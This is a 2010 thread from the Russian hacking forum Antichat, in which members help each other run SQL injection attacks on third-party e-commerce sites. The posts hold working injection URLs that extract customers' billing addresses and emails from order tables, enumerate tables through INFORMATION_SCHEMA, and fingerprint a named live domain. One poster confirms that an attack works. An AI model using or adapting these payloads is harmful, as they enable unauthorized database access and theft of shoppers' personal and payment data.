ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 22.02.2010, 16:33
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами: 10227206

Репутация: 2163
По умолчанию

Цитата:
Сообщение от 3blK0B  
http://site.com/cart.asp?cartItemQuantity6=0&cartItemId=76'+or+1=( select+top+1+orderCardBillAddress1+from+Order)--

При попытке получить данные их таблицы Order выдает ошибку:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Incorrect syntax near the keyword 'Order'.
/cart.asp, line 352

я так понимаю проблема в том что SQL воспринимает название таблицы как "order by", так как данные из таблиц с другим названием получаются без проблем. Как представить название таблицы Order чтобы ее SQL принял как имя таблицы? Пробовал переводить в HEX, но это не помогло. Заранее спасибо за помощь!
from [order], from "order"
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
 
Ответить с цитированием

  #2  
Старый 23.02.2010, 02:12
3blK0B
Новичок
Регистрация: 28.09.2009
Сообщений: 19
С нами: 8746887

Репутация: 28
По умолчанию

Цитата:
Сообщение от l1ght  
from [order], from "order"
Спасибо, l1ght! Все работает! А то хотел уже прыгать с моста... С меня креда!
 
Ответить с цитированием

  #3  
Старый 22.02.2010, 15:47
B1t.exe
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
С нами: 10268804

Репутация: 208


По умолчанию

mailbrush
А я думал все сторонники стеба и флуда. спасибо за понимание. таких людей побольше бы в ачате!

Strilo4ka

Мэн, не в обуду, но я не шаря в этом деле - могу сказать, что тут /etc/shadow и /etc/passwd вообше не причем, т.к. из путей видно, что сервер на WINDOWS. По этому речь о /etc/ идти не может.

-------------

И как я понял - это НЕ уязвимость, а просто недоделка веб мастера. Сайт чуть ли не умерший. наверно туда очень редко заходят. сайт персональный (певец). Америкосы делали
Вопрос пока в силе - можно ли (и каким образом) пользоватся этим ?
Если логично дуать, то там стоит MSSQL хотя.. может и нет..
 
Ответить с цитированием

  #4  
Старый 22.02.2010, 16:01
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами: 9347610

Репутация: 165
По умолчанию

B1t.exe, кроме как раскрытие путей ты не чего не поимешь, т.к. там тупа нет подключаемого файла news.php
Там типа вот этого
PHP код:
<?php
include "news.php";
?>
а не
PHP код:
<?php
include $_GET[page];
?>
т.е. на запрос повлиять нельзя.
3blK0B, читай http://forum.antichat.ru/thread30501.html

Последний раз редактировалось SeNaP; 22.02.2010 в 16:06..
 
Ответить с цитированием

  #5  
Старый 22.02.2010, 16:17
B1t.exe
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
С нами: 10268804

Репутация: 208


По умолчанию

SeNaP
хмм. так и понял, что это не уязвимость
вот пробую такие комбинации:
Код:
http://www.site.com/index.php? it=1' or 1=(select db_name())--
http://www.site.com/index.php?it=1'
http://www.site.com/index.php?it=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+IN FORMATION_SCHEMA.TABLES)--
все вкидывают на главную страницу и никаких ошибок.
может там не MSSQL ? или все же хорошо защищен от иньекции ?
 
Ответить с цитированием

  #6  
Старый 22.02.2010, 16:24
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами: 9347610

Репутация: 165
По умолчанию

Цитата:
Сообщение от B1t.exe  

вот пробую такие комбинации:
Код:
http://www.site.com/index.php? it=1' or 1=(select db_name())--
http://www.site.com/index.php?it=1'
http://www.site.com/index.php?it=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+IN FORMATION_SCHEMA.TABLES)--
все вкидывают на главную страницу и никаких ошибок.
может там не MSSQL ? или все же хорошо защищен от иньекции ?

на

http://www.site.com/index.php? it=1'
or
http://www.site.com/index.php? it=-1'
что выдаёт?
 
Ответить с цитированием

  #7  
Старый 22.02.2010, 17:55
B1t.exe
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
С нами: 10268804

Репутация: 208


По умолчанию

Цитата:
Сообщение от SeNaP  
на

http://www.site.com/index.php? it=1'
or
http://www.site.com/index.php? it=-1'
что выдаёт?
ноль реакции кидает на галвную (ссылка не меняется)
 
Ответить с цитированием

  #8  
Старый 22.02.2010, 17:56
Darren
Banned
Регистрация: 14.06.2008
Сообщений: 34
С нами: 9424793

Репутация: 13
По умолчанию

Почему может выходить такая ошибка когда я пытаюсь вывести данные
запрос типа:
http://xxx/latest.asp?ID=&offset=&prod_id=8896%20union+select %201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39,40,email%20from%20orders%20--

ADODB.Command error '800a0d5d'
Application uses a value of the wrong type for the current operation.
/ProdDetail1.asp, line 20
 
Ответить с цитированием

  #9  
Старый 22.02.2010, 17:59
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами: 9347610

Репутация: 165
По умолчанию

Цитата:
Сообщение от Darren  
Почему может выходить такая ошибка когда я пытаюсь вывести данные
запрос типа:
http://xxx/latest.asp?ID=&offset=&prod_id=8896%20union+select %201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39,40,email%20from%20orders%20--

ADODB.Command error '800a0d5d'
Application uses a value of the wrong type for the current operation.
/ProdDetail1.asp, line 20
MSSQL

Цитата:
Сообщение от B1t.exe  
ноль реакции кидает на галвную (ссылка не меняется)
А с чего ты тогда вообще взял, что там SQL inj?
 
Ответить с цитированием

  #10  
Старый 22.02.2010, 18:10
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами: 10227206

Репутация: 2163
По умолчанию

Цитата:
Сообщение от SeNaP  
MSSQL
Цитата:
Сообщение от 0x0.Injector  
2 SeNaP а помоему Access
Цитата:
Сообщение от mailbrush  
Если доступа к information_schema нету
mysql, причем http://www.limenatural.co.uk/prod1.asp?ID=1+or+substring(version(),1,1)=4
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.